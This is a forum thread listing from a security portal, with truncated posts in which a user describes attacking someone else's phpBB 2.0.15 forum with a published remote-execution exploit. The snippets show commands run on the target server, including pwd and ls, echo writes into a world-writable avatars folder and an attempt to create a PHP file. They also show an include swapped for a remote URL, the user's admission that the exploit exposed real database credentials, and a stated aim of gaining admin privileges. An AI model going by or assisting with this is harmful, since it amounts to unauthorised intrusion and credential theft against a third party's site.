|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
|
ok, I think I will quit this forum though I really wanted to do this...
ls - disabled
cat - disabled
(though they worked a couple of days ago....)
I can't do really much blindfolded...
echo-in ... |
|
|
|
|
ok, eighter i'm stupid, or i am....
did this:
phpBB2.0.15> pwd
27
/hosting/www/www.site.com-docs/forum
f
phpBB2.0.15> echo "<?php" > /hosting/www/www.site.com-docs/fo ... |
|
|
|
|
ok, replaced one line, include('config.php'); with include('http://site.com/forum/config.php'); nothing happens eighter... |
|
|
|
|
Yes, you have to change it.
If you knew, what you have been copying, you would know that "config.php" is included. And where is it? I'm sure, that it isn't in "images/avatars"... So set the path via ... |
|
|
|
|
Sorry, but i had some ISP trouble and no internet connection...
Tryied again to connect to that forum, and worked, but the ls, cat, rm (only ones i've tested) commands doesent work anymore.
So i've ... |
|
|
|
|
ok, so,
echo test >> /hosting/www/www.domain.com-docs/forum/images/avatars/test.txt
makes the txt file but it contains the word test written several times, like this:
test
test
test
test
... |
|
|
|
|
* Sory for the multi-post, but just tryied this:
Obviously the 'avatars' dir within the 'images' one has chmod 777:
phpBB2.0.15> ls images -l
9
total 13
37
drwxrwxrwx 3 32028 web-user ... |
|
|
|
|
ok, thanks waraxe for noticeing me... but... i'm posting under the n00b section... you've got me all confused now... where to write the script? and how to upload it... anyway... i just want admin priv ... |
|
|
|
|
chmod 777 - no efect what so ever, i think you must be admin-loged in order for that to work
the pwd result:
phpBB2.0.15> pwd
27
/hosting/www/www.domain.com-docs/forum
f
phpBB2.0.15&g ... |
|
|
|
|
1. theforumdbname, thedbuser and thedbpass, I have replaced them on this post, in fact that exploit had shown me the real ones.
2. ls -l get's this:
phpBB2.0.15> ls -l
a
total 385
36
dr ... |
|
|
|
|
Hello all first,
I'm reading this forum for a month or so trying to get a solution to hack a phpBB 2.0.15 forum...
Finlly found this exploit http://downloads.securityfocus.com/vulnerabilities/exploi ... |
|
|
Page 1 of 1 |
All times are GMT |
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|